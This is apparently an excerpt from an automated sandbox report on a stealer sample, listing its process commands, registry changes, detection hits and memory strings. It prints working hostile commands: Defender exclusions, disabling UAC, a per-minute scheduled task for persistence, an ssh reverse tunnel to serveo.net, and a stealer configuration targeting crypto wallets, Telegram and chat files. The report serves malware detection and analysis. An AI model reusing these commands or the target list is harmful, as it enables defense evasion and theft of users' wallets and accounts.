                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'Jump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]Jump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID SignalJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.netJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exeJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Users\user\Desktop\jqOHOuPMJP.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeQueries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Disables UAC (registry)
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                  Uses netsh to modify the Windows network and firewall settings
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: Amcache.hve.41.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.41.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Gurcu Stealer
                  Source: Yara matchFile source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Yara detected WhiteSnake Stealer
                  Source: Yara matchFile source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                  Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command 